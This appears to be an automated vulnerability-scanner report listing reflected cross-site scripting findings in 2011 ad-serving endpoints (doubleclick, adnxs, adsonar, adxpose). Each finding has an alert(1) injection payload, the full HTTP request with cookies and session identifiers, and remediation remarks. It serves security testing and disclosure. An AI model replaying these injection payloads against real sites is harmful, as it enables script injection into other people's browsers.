The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 857b4'-alert(1)-'08732a8e926 was submitted in the _d parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091857b4'-alert(1)-'08732a8e926&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 2148 Cache-Control: no-cache Pragma: no-cache Date: Tue, 08 Feb 2011 02:37:30 GMT Expires: Tue, 08 Feb 2011 02:37:30 GMT Connection: close
The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c60b'-alert(1)-'523339f5bfc was submitted in the _eo parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=979573c60b'-alert(1)-'523339f5bfc&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 2148 Cache-Control: no-cache Pragma: no-cache Date: Tue, 08 Feb 2011 02:37:26 GMT Expires: Tue, 08 Feb 2011 02:37:26 GMT Connection: close
The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c07e'-alert(1)-'28d99075a5e was submitted in the _et parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=12971318034c07e'-alert(1)-'28d99075a5e&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 2148 Cache-Control: no-cache Pragma: no-cache Date: Tue, 08 Feb 2011 02:37:27 GMT Expires: Tue, 08 Feb 2011 02:37:27 GMT Connection: close
The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6569c'-alert(1)-'0822de605bd was submitted in the _o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=6323106569c'-alert(1)-'0822de605bd&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 2148 Cache-Control: no-cache Pragma: no-cache Date: Tue, 08 Feb 2011 02:37:24 GMT Expires: Tue, 08 Feb 2011 02:37:24 GMT Connection: close
The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a436'-alert(1)-'1e02b24949 was submitted in the _pm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=979573a436'-alert(1)-'1e02b24949&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 2145 Cache-Control: no-cache Pragma: no-cache Date: Tue, 08 Feb 2011 02:37:31 GMT Expires: Tue, 08 Feb 2011 02:37:31 GMT Connection: close
The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de550'-alert(1)-'03ca2570388 was submitted in the _pn parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094de550'-alert(1)-'03ca2570388&redirect=;u=17097094;ord=8870513? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 2148 Cache-Control: no-cache Pragma: no-cache Date: Tue, 08 Feb 2011 02:37:32 GMT Expires: Tue, 08 Feb 2011 02:37:32 GMT Connection: close
The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a2c1'-alert(1)-'16f489b5f1f was submitted in the _s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=09a2c1'-alert(1)-'16f489b5f1f&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 2148 Cache-Control: no-cache Pragma: no-cache Date: Tue, 08 Feb 2011 02:37:29 GMT Expires: Tue, 08 Feb 2011 02:37:29 GMT Connection: close
The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac8bd'-alert(1)-'8cff4cbdcbd was submitted in the redirect parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=ac8bd'-alert(1)-'8cff4cbdcbd HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 2112 Cache-Control: no-cache Pragma: no-cache Date: Tue, 08 Feb 2011 02:37:33 GMT Expires: Tue, 08 Feb 2011 02:37:33 GMT Connection: close
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94136'-alert(1)-'b9a6d1d5de1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/x1.rtb/boa/mledge/jan/boapage/rmkt;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=f3206e2d-999f-4886-b0ef-20f1b35bb6cb94136'-alert(1)-'b9a6d1d5de1&_o=632310&_eo=97957&_et=1297131803&_a=17097064&_s=0&_d=17097091&_pm=97957&_pn=17097094&redirect=;u=17097094;ord=8870513? HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 2148 Cache-Control: no-cache Pragma: no-cache Date: Tue, 08 Feb 2011 02:37:24 GMT Expires: Tue, 08 Feb 2011 02:37:24 GMT Connection: close
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e51c'-alert(1)-'aa9ea0b725b was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=1939e51c'-alert(1)-'aa9ea0b725b&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfw)lg>By]-!h!'>_I$udMi:J<T#zJGib(!P*.RI<FKCnDh[uiT+^/2+eMLsoLb?^Dz+yufH7FWQ6/y8I42VHJ.4%+m=^T>-w#L5HjI=M>tS[B>RcnZ6T2lhKM#(w`kYnh]me8IXe<5$$-@o]FbRGN4@X`e`DiynIifj/x<.eMm_t-^T04B.3!87!=A6$`NN8QhJOdb'5%5[A9*=.@8!//wVWE<i:qf:041WiCRg7?`HN2w_^'Xbp6xqG!u(<ik8pm.eE*)cs4WekRnp.N6`Ow-_#nZljbUQhxpwPR2Z!$DZRf)pVH%0<JHBTE1(`9dJBRY#aMIZk?1qXe%-/hhrqWm%1fdRw3L6.X?M^VlzaV^AjhXisNEMf$D-E:>Ac%)^QgDi:2Pu3$hFNE'kc?8O^NJGs5W1X9/U50IrgTb9y*5GJDkg9^w1QF/iXp`p=EKk8^l$T93mFdiq%`MJ*1r@rU><qp_)Lf'BDvLSe`Hdb)O2uaBL>yo/rlKJh6r'._tK2vZ!ADROTU4`e
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 09-Feb-2011 02:09:39 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 09-May-2011 02:09:39 GMT; domain=.adnxs.com; HttpOnly Content-Type: application/x-javascript Date: Tue, 08 Feb 2011 02:09:39 GMT Content-Length: 183
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3994c'-alert(1)-'0d2a8bddf42 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /usersync?calltype=admeld&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match3994c'-alert(1)-'0d2a8bddf42 HTTP/1.1 Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfw)lg>By]-!h!'>_I$udMi:J<T#zJGib(!P*.RI<FKCnDh[uiT+^/2+eMLsoLb?^Dz+yufH7FWQ6/y8I42VHJ.4%+m=^T>-w#L5HjI=M>tS[B>RcnZ6T2lhKM#(w`kYnh]me8IXe<5$$-@o]FbRGN4@X`e`DiynIifj/x<.eMm_t-^T04B.3!87!=A6$`NN8QhJOdb'5%5[A9*=.@8!//wVWE<i:qf:041WiCRg7?`HN2w_^'Xbp6xqG!u(<ik8pm.eE*)cs4WekRnp.N6`Ow-_#nZljbUQhxpwPR2Z!$DZRf)pVH%0<JHBTE1(`9dJBRY#aMIZk?1qXe%-/hhrqWm%1fdRw3L6.X?M^VlzaV^AjhXisNEMf$D-E:>Ac%)^QgDi:2Pu3$hFNE'kc?8O^NJGs5W1X9/U50IrgTb9y*5GJDkg9^w1QF/iXp`p=EKk8^l$T93mFdiq%`MJ*1r@rU><qp_)Lf'BDvLSe`Hdb)O2uaBL>yo/rlKJh6r'._tK2vZ!ADROTU4`e
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Wed, 09-Feb-2011 02:09:51 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Mon, 09-May-2011 02:09:51 GMT; domain=.adnxs.com; HttpOnly Content-Type: application/x-javascript Date: Tue, 08 Feb 2011 02:09:51 GMT Content-Length: 183
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload bc86f<script>alert(1)</script>71f7e59fb6 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1506171&pid=871775bc86f<script>alert(1)</script>71f7e59fb6&ps=-1&zw=470&zh=150&url=http%3A//www.nypost.com/&v=5&dct=New%20York%20News%20%7C%20Gossip%20%7C%20Sports%20%7C%20Entertainment%20%7C%20Photos%20-%20New%20York%20Post&metakw=breaking%20news,headline%20news,current%20news,late%20breaking%20news,current%20news%20events HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 02:08:42 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC" Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding,User-Agent Content-Length: 2508
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "871775bc86f<script>alert(1)</script>71f7e59fb6"
The value of the placementId request parameter is copied into an HTML comment. The payload 48b92--><script>alert(1)</script>af79d177dbe was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=150617148b92--><script>alert(1)</script>af79d177dbe&pid=871775&ps=-1&zw=470&zh=150&url=http%3A//www.nypost.com/&v=5&dct=New%20York%20News%20%7C%20Gossip%20%7C%20Sports%20%7C%20Entertainment%20%7C%20Photos%20-%20New%20York%20Post&metakw=breaking%20news,headline%20news,current%20news,late%20breaking%20news,current%20news%20events HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 02:08:29 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/plain Content-Length: 3351
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "150617148b92--><script>alert(1)</script>af79d177dbe" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload e0894--><script>alert(1)</script>92409ecc7b8 was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1506171&pid=871775&ps=-1e0894--><script>alert(1)</script>92409ecc7b8&zw=470&zh=150&url=http%3A//www.nypost.com/&v=5&dct=New%20York%20News%20%7C%20Gossip%20%7C%20Sports%20%7C%20Entertainment%20%7C%20Photos%20-%20New%20York%20Post&metakw=breaking%20news,headline%20news,current%20news,late%20breaking%20news,current%20news%20events HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 02:08:52 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/plain Content-Length: 3790
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-1e0894--><script>alert(1)</script>92409ecc7b8" -->
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload a4738<script>alert(1)</script>f88ad01177e was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads/ads.js?uid=M6uzDYEbWGBrvdnp_69536a4738<script>alert(1)</script>f88ad01177e HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2; JSESSIONID=FE63B20AA109FA6FB60FDC6E14F5F959
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=A7A2A3A6B39BC5D8BC3D5B6D17528BD6; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:46:29 GMT Connection: close
The value of the altbannerurl request parameter is copied into the HTML document as plain text between tags. The payload 7b7f7<img%20src%3da%20onerror%3dalert(1)>865d86afc07 was submitted in the altbannerurl parameter. This input was echoed as 7b7f7<img src=a onerror=alert(1)>865d86afc07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69536&cid=EI9-DR-Interclick&vchannel=9075&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D51%2526b%253D9075%2526cid%253D7645468%2526isif%253Df%2526rurld%253Dwww.nypost.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.nypost.com%252F%2526rurl%253Dhttp%25253A%25252F%25252Fwww.nypost.com%25252F%2526blkAdxp%253D17b7f7<img%20src%3da%20onerror%3dalert(1)>865d86afc07 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=912E69DD8FDBA27C540045C338568E80; Path=/ Content-Type: text/javascript;charset=UTF-8 Content-Length: 730 Date: Tue, 08 Feb 2011 02:46:44 GMT Connection: close
The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 86d9f<img%20src%3da%20onerror%3dalert(1)>fcea5a88802 was submitted in the cid parameter. This input was echoed as 86d9f<img src=a onerror=alert(1)>fcea5a88802 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69536&cid=EI9-DR-Interclick86d9f<img%20src%3da%20onerror%3dalert(1)>fcea5a88802&vchannel=9075&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D51%2526b%253D9075%2526cid%253D7645468%2526isif%253Df%2526rurld%253Dwww.nypost.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.nypost.com%252F%2526rurl%253Dhttp%25253A%25252F%25252Fwww.nypost.com%25252F%2526blkAdxp%253D1 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=4CBBAE03D814E81407E7BA4F085CD829; Path=/ Content-Type: text/javascript;charset=UTF-8 Content-Length: 730 Date: Tue, 08 Feb 2011 02:46:35 GMT Connection: close
1.28. http://ads.adxpose.com/ads/tag.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.adxpose.com
Path:
/ads/tag.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf953<img%20src%3da%20onerror%3dalert(1)>4539cb68142 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf953<img src=a onerror=alert(1)>4539cb68142 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69536&cid=EI9-DR-Interclick&vchannel=9075&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D51%2526b%253D9075%2526cid%253D7645468%2526isif%253Df%2526rurld%253Dwww.nypost.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.nypost.com%252F%2526rurl%253Dhttp%25253A%25252F%25252Fwww.nypost.com%25252F%2526blkAdxp%253D1&bf953<img%20src%3da%20onerror%3dalert(1)>4539cb68142=1 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
